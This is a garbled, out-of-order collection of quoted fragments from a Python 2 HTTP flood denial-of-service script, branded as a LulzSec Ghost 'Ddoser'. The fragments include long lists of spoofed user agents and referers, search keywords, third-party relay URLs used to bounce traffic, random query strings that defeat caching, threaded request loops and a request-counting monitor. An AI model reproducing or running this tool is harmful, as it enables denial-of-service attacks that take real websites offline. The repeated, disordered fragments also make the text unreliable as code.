(<EMAIL>)')", "OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)')", "headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook')", "headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at", "(abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at", "except Exception, ex: pass # monitors http threads and counts requests class MonitorThread(threading.Thread):", "keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS')", "U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1;", "flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else:", "(Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android", "www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser", "like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0", "headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0;", "(KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like", "AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10')", "headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07", "agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)", "Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca", "headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501", "headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2", "bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string", "(PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2;", "crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre')", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')", "keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger')", "Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x", "keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson", "headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP", "(Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)')", "url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def", "headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4')", "Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy", "keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst')", "isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U;", "(Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001", "def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url", "3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible;", "com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x')", "\"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url", "headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version:", "90) out_str += chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py <url>'", "Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like", "Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>')", "headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)')", "headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind')", "+= chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec", "RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler", "keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca", "nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://'", "MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x", "Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url", "(request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2:", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100", "at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad", "/ |`-:_ ; | | | : \\ `--. ) /|-._: : |", "Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;", ".NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0", "1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK", "Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0;", "(+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com", "ascii string def buildblock(size): out_str = '' for i in range(0, size): a", "def usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By", "X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20", "headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0", "Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U;", "headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U;", "code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller", "flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass # monitors", "headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1", "Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) &", "Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')", "4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U;", "robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx')", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4;", ": : / ( ;|;-./_ _/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,'", "headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot;", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML,", "Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345", "headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com;", "(Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile", "/ / / / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,", "Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st", "`' ,' `. / |`-:_ ; | | | : \\ `--. )", "' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O", "CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11;", "headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)')", "isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher", "\\ \\ / / :_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics')", "(.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", ": / `'-'--'----'---------' | | : O ._O O_. O ._O O_. ;", "GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch;", "MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0", "NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS", "headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x')", "Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0')", "ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux;", "keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host +", "Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like", "OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1')", "array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3", "5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1;", "(http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x')", "MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0;", "headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) (", "urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class", "Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0", "CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v.", "Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and", "( ;|;-./_ _/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,' | : /", "headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE')", "V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8", "Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like", "(aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo", "Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30", "Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/;", "CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible;", "headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 